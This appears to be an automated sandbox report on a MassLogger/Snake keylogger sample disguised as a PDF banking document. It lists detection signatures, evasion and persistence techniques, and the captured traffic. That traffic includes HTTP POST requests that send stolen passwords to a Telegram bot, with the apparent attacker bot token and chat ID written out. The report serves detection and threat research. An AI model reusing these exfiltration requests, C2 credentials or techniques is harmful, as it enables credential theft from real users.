Windows Analysis Report
BEPZA MT103 Credit.pdf.exe

Overview

General Information

Sample name: BEPZA MT103 Credit.pdf.exe
Analysis ID: 1665813
MD5: ef4d4ab7e588827c7a17293b53a30d1f
SHA1: 6e2fd3bc90fce07f121e9eb3ad94545f30773ec6
SHA256: c6de8c6d5228fa7a6101a2cf1574d974f48d8e6caf1c862cc5004d36cf3d527b
Tags: exeuser-James_inthe_box
Infos:

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: BEPZA MT103 Credit.pdf.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Avira: detection malicious, Label: HEUR/AGEN.1307338
Found malware configuration
Source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs", "Telegram Chatid": "7135428463"}
Source: YEGIgzyAhkvT.exe.8120.16.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: BEPZA MT103 Credit.pdf.exe Virustotal: Detection: 66% Perma Link
Source: BEPZA MT103 Credit.pdf.exe ReversingLabs: Detection: 75%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.8%

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: BEPZA MT103 Credit.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: BEPZA MT103 Credit.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 4x nop then jmp 02B99731h 10_2_02B99480
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 4x nop then jmp 02B99E5Ah 10_2_02B99A30
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 4x nop then jmp 02B99E5Ah 10_2_02B99D87
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269731h 16_2_01269480
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269E5Ah 16_2_01269A40
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269E5Ah 16_2_01269A30
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269E5Ah 16_2_01269D87

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49699 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49699 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c32738635eaHost: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c3273964b09Host: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49689 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 132.226.247.73:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c32738635eaHost: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.orgd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/d
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3718729312.0000000006450000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m1
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgd
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 0000000B.00000002.1310845235.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161d
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161l
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: BEPZA MT103 Credit.pdf.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_02FB4B00 0_2_02FB4B00
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_02FBD3C4 0_2_02FBD3C4
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_05658890 0_2_05658890
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_05650040 0_2_05650040
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_05650006 0_2_05650006
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_0565D5B3 0_2_0565D5B3
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077B5E00 0_2_077B5E00
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077BB0E0 0_2_077BB0E0
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077BE942 0_2_077BE942
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C57750 0_2_07C57750
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C57760 0_2_07C57760
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55618 0_2_07C55618
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55628 0_2_07C55628
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C56D50 0_2_07C56D50
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C56D60 0_2_07C56D60
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C5D560 0_2_07C5D560
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55A60 0_2_07C55A60
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C551F0 0_2_07C551F0
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C5E9A8 0_2_07C5E9A8
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B9C530 10_2_02B9C530
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B99480 10_2_02B99480
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B9C521 10_2_02B9C521
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B92DDB 10_2_02B92DDB
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B9946F 10_2_02B9946F
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD60F7 10_2_06BD60F7
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD5DB4 10_2_06BD5DB4
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BDB650 10_2_06BDB650
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD31A8 10_2_06BD31A8
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD6C71 10_2_06BD6C71
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD4A60 10_2_06BD4A60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0136D3C4 11_2_0136D3C4
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07485E00 11_2_07485E00
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0748B0E0 11_2_0748B0E0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0748E942 11_2_0748E942
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07887750 11_2_07887750
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07887760 11_2_07887760
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885618 11_2_07885618
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885628 11_2_07885628
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0788DD00 11_2_0788DD00
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07886D50 11_2_07886D50
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07886D60 11_2_07886D60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0788CCC0 11_2_0788CCC0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885A60 11_2_07885A60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_078851F0 11_2_078851F0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126C530 16_2_0126C530
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_01262DD1 16_2_01262DD1
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_01269480 16_2_01269480
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126C521 16_2_0126C521
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126946F 16_2_0126946F
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C05DB4 16_2_06C05DB4
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C0B650 16_2_06C0B650
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C031A8 16_2_06C031A8
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C06C71 16_2_06C06C71
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C04A60 16_2_06C04A60
Sample file is different than original file name gathered from version info
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1290497028.0000000008160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1263065941.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1283020258.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
